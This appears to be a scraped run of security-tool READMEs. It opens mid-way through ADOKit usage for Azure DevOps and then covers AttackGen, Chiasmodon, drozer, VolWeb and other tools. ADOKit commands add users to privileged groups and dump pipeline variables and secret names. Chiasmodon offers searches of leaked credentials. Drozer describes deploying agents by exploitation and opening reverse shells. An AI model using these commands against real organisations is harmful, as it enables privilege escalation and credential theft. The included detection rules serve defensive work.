[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.


Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:01 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith
[YourOrganization]\Project Collection Service Accounts | [email protected] | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.


Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 11:21:43 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | [email protected] | John Smith

4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.


Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/6/2023 12:08:35 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.


Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/10/2023 10:28:37 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.


Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/11/2023 8:34:16 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections


Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.


  • Support for Azure DevOps Server


  • https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
  • https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops

Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.

Star the Repo

If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! โญ


  • Generates unique incident response scenarios based on chosen threat actor groups.
  • Allows you to specify your organisation's size and industry for a tailored scenario.
  • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
  • Create custom scenarios based on a selection of ATT&CK techniques.
  • Capture user feedback on the quality of the generated scenarios.
  • Downloadable scenarios in Markdown format.
  • ๐Ÿ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
  • Available as a Docker container image for easy deployment.
  • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


v0.4 (current)

What's new? Why is it useful?
Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.


What's new? Why is it useful?
Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

- Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

- User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.


What's new? Why is it useful?
Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

- Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
Improved error handling for missing API keys - Improved user experience.
Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).


Initial release.


  • Recent version of Python.
  • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
  • OpenAI API key.
  • LangChain API key (optional) - see LangSmith Setup section below for further details.
  • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.


Option 1: Cloning the Repository

  1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
  1. Change directory into the cloned repository:
cd attackgen
  1. Install the required Python packages:
pip install -r requirements.txt

Option 2: Using Docker

  1. Pull the Docker container image from Docker Hub:
docker pull mrwadams/attackgen

LangSmith Setup

If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

Running AttackGen

After the data setup, you can run AttackGen with the following command:

streamlit run ๐Ÿ‘‹_Welcome.py

You can also try the app on Streamlit Community Cloud.


Running AttackGen

Option 1: Running the Streamlit App Locally

  1. Run the Streamlit app:
streamlit run ๐Ÿ‘‹_Welcome.py
  1. Open your web browser and navigate to the URL provided by Streamlit.
  2. Use the app to generate standard or custom incident response scenarios (see below for details).

Option 2: Using the Docker Container Image

  1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen

This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

Generating Scenarios

Standard Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisatin's industry and size from the dropdown menus.
  4. Navigate to the Threat Group Scenarios page.
  5. Select the Threat Actor Group that you want to simulate.
  6. Click on 'Generate Scenario' to create the incident response scenario.
  7. Use the ๐Ÿ‘ or ๐Ÿ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Custom Scenario Generation

  1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
  2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
  3. Select your organisation's industry and size from the dropdown menus.
  4. Navigate to the Custom Scenario page.
  5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
  6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
  7. Use the ๐Ÿ‘ or ๐Ÿ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.


I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.


This project is licensed under GNU GPLv3.

Chiasmodon - An OSINT Tool Designed To Assist In The Process Of Gathering Information About A Target Domain

Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.


  • [x] ๐ŸŒDomain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
  • [x] ๐ŸŽฎGoogle Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
  • [x] ๐Ÿ”ŽCIDR and ๐Ÿ”ขASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
  • [x] โœ‰๏ธEmail, ๐Ÿ‘คUsername, ๐Ÿ”’Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
  • [x] ๐Ÿ“‹Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
  • [x] โš™๏ธAdditional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

๐Ÿš€Comming soon

  • ๐Ÿ“ฑPhone: Get ready to uncover even more valuable data by searching for information associated with phone numbers. Whether you're investigating a particular individual or looking for connections between phone numbers and other entities, this new feature will provide you with valuable insights.

  • ๐ŸขCompany Name: We understand the importance of comprehensive company research. In our upcoming release, you'll be able to search by company name and access a wide range of documents associated with that company. This feature will provide you with a convenient and efficient way to gather crucial information, such as legal documents, financial reports, and other relevant records.

  • ๐Ÿ‘คFace (Photo): Visual data is a powerful tool, and we are excited to introduce our advanced facial recognition feature. With "Search by Face (Photo)," you can upload an image containing a face and leverage cutting-edge technology to identify and match individuals across various data sources. This will allow you to gather valuable information, such as social media profiles, online presence, and potential connections, all through the power of facial recognition.

Why Chiasmodon name ?

Chiasmodon niger is a species of deep sea fish in the family Chiasmodontidae. It is known for its ability to swallow fish larger than itself. and so do we. ๐Ÿ˜‰ย 

๐Ÿ”‘ Subscription

Join us today and unlock the potential of our cutting-edge OSINT tool. Contact https://t.me/Chiasmod0n on Telegram to subscribe and start harnessing the power of Chiasmodon for your domain investigations.


pip install chiasmodon


Chiasmodon provides a flexible and user-friendly command-line interface and python library. Here are some examples to demonstrate its usage:

How to use pychiasmodon library:

from pychiasmodon import Chiasmodon as ch 
obj = ch(token)
  • Searching for a target domain and its subdomains:

    • Command line bash chiasmodon_cli.py --domain example.com --all
    • Python ```python result = obj.search('example.com',method='domain', all=True)

      for i in result: print(i) ```

  • Searching for a target domain, you will see the result for only this "example.com":

    • Command line bash chiasmodon_cli.py --domain example.com
    • Python ```python result = obj.search('example.com',method='domain')

      for i in result: print(i) ```

  • Searching for a target application ID on the Google Play Store:

    • Command line bash chiasmodon_cli.py --app com.discord
    • Python ```python result = obj.search('com.discord',method='app')

      for i in result: print(i) ```

  • Searching for a target ASN:

    • Command line bash chiasmodon_cli.py --asn AS123 --view-type cred
    • Python ```python result = obj.search('AS123',method='asn', view_type='cred')

      for i in result: print(i) ```

  • earching for a target username:

    • Command line bash chiasmodon_cli.py --username someone
    • Python ```python result = obj.search('someone',method='username')

      for i in result: print(i) ```

  • Searching for a target password:

    • Command line bash chiasmodon_cli.py --password example@123
    • Python ```python result = obj.search('example@123',method='password')

      for i in result: print(i) ```

  • Searching for a target CIDR:

    • Command line bash chiasmodon_cli.py --cidr x.x.x.x/24
    • Python ```python result = obj.search('x.x.x.x/24',method='cidr')

      for i in result: print(i) ```

  • Searching for target credentials by domain emails:

    • Command line bash chiasmodon_cli.py --domain example.com --domain-emails
    • Python ```python result = obj.search('example.com',method='domain', only_domain_emails=True)

      for i in result: print(i) ``` - All methods and view types:

    Methods View Type
    --domain, --email, --cidr, --app, --asn, --username, --password --view-type cred
    --cidr, --asn, --email, --username, --password --view-type app
    --domain, --email, --cidr, --asn, --username, --password --view-type url
    --domain --view-type subdomain
    --domain, --cidr, --asn, --app --view-type email
    --domain, --cidr, --app, --asn, --email, --password --view-type username
    --domain, --cidr, --app, --asn, --email, --username --view-type password

Please note that these examples represent only a fraction of the available options and use cases. Refer to the documentation for more detailed instructions and explore the full range of features provided by Chiasmodon.

๐Ÿ’ฌ Contributions and Feedback

Contributions and feedback are welcome! If you encounter any issues or have suggestions for improvements, please submit them to the Chiasmodon GitHub repository. Your input will help us enhance the tool and make it more effective for the OSINT community.


Chiasmodon is released under the MIT License. See the LICENSE file for more details.

โš ๏ธDisclaimer

Chiasmodon is intended for legal and authorized use only. Users are responsible for ensuring compliance with applicable laws and regulations when using the tool. The developers of Chiasmodon disclaim any responsibility for the misuse or illegal use of the tool.


Chiasmodon is the result of collaborative efforts from a dedicated team of contributors who believe in the power of OSINT. We would like to express our gratitude to the open-source community for their valuable contributions and support.

ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.

~ Hilali Abdel


python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a

python3 smarthings.py -s --type TPLINK

python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVE and Poc [ firmware and device type]


Scan device for open upnp ports

python3 smartthings.py -s --scan upnp --id

get data from mqtt 'subscribe'

python3 smartthings.py -s --scan mqtt --id

VolWeb - A Centralized And Enhanced Memory Analysis Platform

VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

Project Documentation and Getting Started Guide

The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

[!IMPORTANT] Take time to read the documentation in order to avoid common miss-configuration issues.

Interacting with the REST API

VolWeb exposes a REST API to allow analysts to interact with the platform. There is a dedicated repository proposing some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts Check the wiki of the project to learn more about the possible API calls.


If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to quickly address them, follow the guide in the "Contributing" section of the Wiki associated with the project.


Contact me at [email protected] for any questions regarding this tool.

Next Release Goals

Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1

Drozer - The Leading Security Assessment Framework For Android

drozer (formerly Mercury) is the leading security testing framework for Android.

drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/

Docker Container

To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

  • The Docker container and basic setup instructions can be found here.
  • Instructions on building your own Docker container can be found here.

Manual Building and Installation


  1. Python2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  1. Protobuf 2.6 or greater

  2. Pyopenssl 16.2 or greater

  3. Twisted 10.2 or greater

  4. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  1. Android Debug Bridge

Building Python wheel

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install dist/drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -I drozer-2.x.x-1.noarch.rpm

Building for Windows

NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/WithSecureLabs/drozer.git
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 


Installing the Agent

Drozer can be installed using Android Debug Bridge (adb).

Download the latest Drozer Agent here.

$ adb install drozer-agent-2.x.x.apk

Starting a Session

You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

We will use the server embedded in the drozer Agent to do this.

If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

$ adb forward tcp:31415 tcp:31415

Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

Then, on your PC, connect using the drozer Console:

On Linux:

$ drozer console connect

On Windows:

> drozer.bat console connect

If using a real device, the IP address of the device on the network must be specified:

On Linux:

$ drozer console connect --server

On Windows:

> drozer.bat console connect --server

You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

You are now ready to start exploring the device.

Command Reference

Command Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset Remove a named variable that drozer passes to any Linux shells that it spawns.


drozer is released under a 3-clause BSD License. See LICENSE for full details.

Contacting the Project

drozer is Open Source software, made great by contributions from the community.

Bug reports, feature requests, comments and questions can be submitted here.

DroidLysis - Property Extractor For Android Apps

DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.

Installing DroidLysis

  1. Install required system packages
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
  1. Install Android disassembly tools

  2. Apktool ,

  3. Baksmali, and optionally
  4. Dex2jar and
  5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
  1. Get DroidLysis from the Git repository (preferred) or from pip

Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis

Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

  1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
  1. Run it:
python3 ./droidlysis3.py --help


The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.


DroidLysis uses Python 3. To launch it and get options:

droidlysis --help

For example, test it on Signal's APK:

droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

DroidLysis outputs:

  • A summary on the console (see image above)
  • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
  • A database (by default, SQLite droidlysis.db) containing properties it noticed.


Get usage with droidlysis --help

  • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

  • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

  • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

  • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

Sample output directory (--output DIR)

This directory contains (when applicable):

  • A readable AndroidManifest.xml
  • Readable resources in res
  • Libraries lib, assets assets
  • Disassembled Smali code: smali (and others)
  • Package meta information: META-INF
  • Package contents when simply unzipped in ./unzipped
  • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

The following files are generated by DroidLysis:

  • autoanalysis.md: lists each pattern DroidLysis detected and where.
  • report.md: same as what was printed on the console

If you do not need the sample output directory to be generated, use the option --clearoutput.

Import trackers from Exodus etc (--import-exodus)

$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
